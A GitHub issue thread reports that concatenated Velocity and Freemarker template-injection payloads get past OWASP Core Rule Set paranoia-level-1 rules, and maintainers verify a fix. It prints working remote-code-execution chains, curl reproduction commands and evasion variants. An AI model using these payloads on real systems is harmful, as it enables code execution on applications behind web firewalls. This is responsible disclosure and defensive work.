### ISSUE TITLE
Velocity SSTI: working RCE chain undetected at PL1 — 944130, 944110 and 933160 all fall to string concatenation

### ISSUE THREAD

**Issue by Yeagerist0** [coreruleset/coreruleset#4773]
### Description

A Velocity SSTI payload that spawns a process is not detected at PL1. It is caught from PL2 up, so this is a PL1 coverage gap rather than a full bypass — but the three rules it slips past are themselves PL1 rules whose job is catching Java RCE, and each falls to the same trick: splitting a string literal.

The chain contains no literal `runtime`, no `processbuilder`, and no `exec`:

```
#set($x='')#set($c=$x.class.forName('java.lang.Runt'+'ime'))#set($m=$c.getMethod('getRunt'+'ime'))#set($r=$m.invoke($x.class))#set($m2=$c.getMethod('ex'+'ec',$x.class))#set($z=$m2.invoke($r,'id'))
```

Each split defeats one rule:

| Rule | Operator | Defeated by |
| --- | --- | --- |
| 944130 | `@pmFromFile java-classes.data` (68 literal class names) | `'java.lang.Runt'+'ime'` |
| 944110 | `@rx (?:runtime\|processbuilder)` | `'getRunt'+'ime'` |
| 933160 | `@rx ...e(?:val\|x(?:ec\|p))...` | `'ex'+'ec'` |

With those three literals split, nothing at PL1 matches. Velocity resolves the concatenation at evaluation time, so the payload still runs.

I checked whether this is only an artifact of the sandbox build. It is not. Running every `@rx` in `rules/REQUEST-9*.conf` on `main` (4.30.0-dev) against the payload with PCRE, then resolving each match to its `paranoia-level` tag and target variables: every matching rule that targets `ARGS` is PL2 or higher, and the only PL1 matches (920420, 920440, 920450) target headers or filenames. 934200 does not match — it covers `{{...}}`, `#{...}` and `<%...%>`, and has no alternative for Velocity directive syntax. No rule in the ruleset references `forName`, `getMethod`, `invoke` or `getDeclaredMethod`.

This is related to #4732 but not the same claim. That issue reports that `java.lang.Boolean` is missing from `java-classes.data`. The fragment there does evade, but it does not execute anything on its own, and every chain I built that named a listed class was blocked. The problem is not a missing entry in the list — it is that a literal matcher is the only PL1 coverage Velocity has.

### How to reproduce the misbehavior (-> curl call)

Evasive chain, PL1 — returns 200, no rules matched:

```bash
curl -s -o /dev/null -w '%{http_code}\n' -H 'x-crs-paranoia-level: 1' \
  'https://sandbox.coreruleset.org/' --get --data-urlencode \
  "data=#set(\$x='')#set(\$c=\$x.class.forName('java.lang.Runt'+'ime'))#set(\$m=\$c.getMethod('getRunt'+'ime'))#set(\$r=\$m.invoke(\$x.class))#set(\$m2=\$c.getMethod('ex'+'ec',\$x.class))#set(\$z=\$m2.invoke(\$r,'id'))"
```

Control — the same chain written with literals is blocked at PL1:

```bash
curl -s -o /dev/null -w '%{http_code}\n' -H 'x-crs-paranoia-level: 1' \
  'https://sandbox.coreruleset.org/' --get --data-urlencode \
  "data=#set(\$x='')#set(\$rt=\$x.class.forName('java.lang.Runtime'))#set(\$e=\$rt.getRuntime().exec('id'))"
```

### Logs

Sandbox, `OWASP_CRS/4.25.0`, ModSecurity for Apache/2.9.10. PL1 result reproduced 3/3.

```
evasive chain    PL1  HTTP 200  (none)                                          X-Unique-ID: apfiMjukQ1mADkE0tNGNwgAAAQY
evasive chain    PL2  HTTP 403  932240,941330,941340,942200,942370,942430,...   X-Unique-ID: apfiNK5sNQN3MXGv_0VR8AAAAEk
literal control  PL1  HTTP 403  933160,944100,944110,944130,949110,980170       X-Unique-ID: apfiOI2dd4Iivl8d5xfcLgAAANE
```

Confirmation that the payload above is not just syntactically interesting but actually spawns a process — Apache Velocity 2.3, the byte-identical string, evaluated with an empty context:

```
context var $z  = java.lang.ProcessImpl
process stdout  = uid=1000(...) gid=1000(...) groups=...
```

A benign control (`#set($n=7*7)$n`) renders `49` and spawns nothing.

### Suggested direction

Adding `java.lang.Boolean` and friends to `java-classes.data`, or more words to 944110, does not fix this — the evasion is against literal matching itself, not against any particular literal. Two directions that would:

- Give 934200 an alternative for Velocity directive syntax (`#set(`, `#foreach(`, `#if(`) with a code-execution indicator, so Velocity has syntax-level coverage instead of relying on class names.
- Or detect the concatenation pattern itself — a quoted fragment adjacent to `+` and another quoted fragment inside a template expression is not something benign input usually contains.

I am happy to work up a PR with regex-assembly changes and go-ftw tests for whichever direction you prefer, rather than guessing at the false-positive budget.

### Environment

* CRS version: 4.25.0 (sandbox), plus static verification against `main` @ 4.30.0-dev
* Paranoia level setting: PL1 (undetected), PL2/3/4 (blocked)
* ModSecurity version: 2.9.10
* Web Server: Apache/2.4.63 (sandbox)
* Template engine: Apache Velocity 2.3

**Comment by Yeagerist0** [comment]
Follow-up: the same evasion works against Freemarker, which matters more in practice than Velocity because it ships in a lot more Java stacks.

Freemarker's classic RCE names `freemarker.template.utility.Execute`, and `freemarker.template` is in `java-classes.data`, so the literal form is caught. Splitting the literal before `.template` leaves no listed substring:

```
<#assign ex=("freemarker.temp"+"late.utility.Execute")?new()><#assign r=ex("touch fm_marker")>
```

One thing worth calling out separately: the usual Freemarker payload ends in `${ex("id")}`, and that `${...}` is caught by 932130 and 933135 — both of which match the shell-expression syntax, not anything Java. Assigning the result instead of printing it removes the `${...}` and with it the only rules that were firing. The command still runs; Freemarker just doesn't render anything.

Sandbox, `OWASP_CRS/4.25.0`, ModSecurity 2.9.10:

```
PL1  http=200  (none)                                            X-Unique-ID: apfmQ65sNQN3MXGv_0VR9wAAAEE
PL2  http=403  932240,941340,942370,942430,942440,949110,980170  X-Unique-ID: apfmWDukQ1mADkE0tNGNyQAAARA
PL3  http=403  ...942431,942460,...                              X-Unique-ID: apfmXDukQ1mADkE0tNGNywAAARU
PL4  http=403  ...920273,942432,...                              X-Unique-ID: apfmXo2dd4Iivl8d5xfcMwAAANA
```

Control: the literal `freemarker.template.utility.Execute` form is 403 at PL1.

Same static check as in the issue body, run against this payload on `main` (4.30.0-dev): no PL1 rule targeting `ARGS` matches. Everything that matches is PL2 or higher.

The payload above is byte-identical to the one I ran under Freemarker 2.3.32 with an empty data model:

```
rendered output = ''   (silent, no ${})
marker created  = true
```

So this is two different Java template engines, two different sets of rules being evaded, and one root cause: the only PL1 coverage either engine has is a list of literal class names, and literals split. Adding `java.lang.Boolean`, or `freemarker.utility`, or any other name to `java-classes.data` does not change that.

Still happy to build the PR — the direction question is unchanged, and I'd rather you pick it than guess at your false-positive budget.

**Comment by Yeagerist0** [comment]
One more piece, because it changes what a fix has to look like.

I went back to ask why these two engines slip through when other template payloads don't, and it isn't the class names — it is which syntax family the payload uses. Everything else gets caught incidentally by a rule that was aimed at something else:

| Template syntax | Caught by | PL |
| --- | --- | --- |
| `${...}` | 932130 (Unix shell expression) | 1 |
| `{%...%}`, `<%...%>` | 934180 | 2 |
| `{{...}}` | 934200, 941380 | 1, 2 |
| `#set(`, `<#assign`, `<@` | nothing below PL4 | — |

Checking each `@rx` in `rules/REQUEST-9*.conf` on `main` against the bare fragments `#set(`, `#foreach(`, `#evaluate(`, `<#assign`, `<#list` and `<@ex`, the only rule that matches any of them is **942432**, a PL4 SQLi rule. That looks accidental rather than intended coverage.

So `#set` and `<#assign>` were not special. Any directive in either family works, and I checked rather than assumed — all six execute, all six are `http=200` with no rule matched at PL1:

| Directive | Executes | PL1 |
| --- | --- | --- |
| Freemarker `<#assign r=ex(...)>` | yes | 200, none |
| Freemarker `<#list [ex(...)] as i>` | yes | 200, none |
| Freemarker `<#if ex(...)??>` | yes | 200, none |
| Velocity `#set($z=...)` | yes | 200, none |
| Velocity `#foreach($i in [...])` | yes | 200, none |
| Velocity `#if(...)` | yes | 200, none |

Execution checked under Freemarker 2.3.32 and Velocity 2.3 with an empty data model, marker file per run.

The point for the fix: keying on `#set` or `<#assign>` specifically would be sidestepped by `#foreach` or `<#list>` the same day. What is missing is coverage for the directive form itself — roughly `#\w+\s*\(` for Velocity and `<#\w+` / `<@\w+` for Freemarker — paired with an execution indicator the way 934200 already pairs `{{...}}` with `(`, `*` or `__`, so it stays off ordinary text containing a `#`.

I have not written that regex, because where it sits on the false-positive curve is a judgement about your budget rather than mine — `#if(` in particular will appear in benign C-ish source. If you tell me which of 934200 or a new 944-series rule you would rather it live in, I will build it with go-ftw tests, including negative tests for the benign cases.

**Comment by airween** [comment]
Hi @Yeagerist0,

thanks for this awesome and detailed report - and thank you for the PR.

We will review both soon (I think by Monday next week at the latest - at CRS monthly chat) and will be back - thank you!

**Comment by fzipi** [comment]
Reviewed and approved #4774, which implements the fix you proposed here.

Independently verified rather than trusting the description: checked out the branch, confirmed the compiled regex regenerates byte-for-byte from the `.ra` source, ran the full `934200` suite (21/21 pass), then reverted just the fix (keeping the new tests) to confirm the 7 new positive tests fail without it and the 4 negative controls pass either way. Replayed your exact Velocity payload from the issue body against a live container — 934200 now fires.

Thanks for the detailed root-cause work across all three comments, it made this fast to verify.

## ai disclosure

- **tools used**: Claude (Sonnet 5)
- **assisted with**: verifying PR #4774's fix against this issue's reported payload
- **review performed**: regex regen check, full test suite run, revert/reconfirm cycle, live payload replay against modsec2-apache
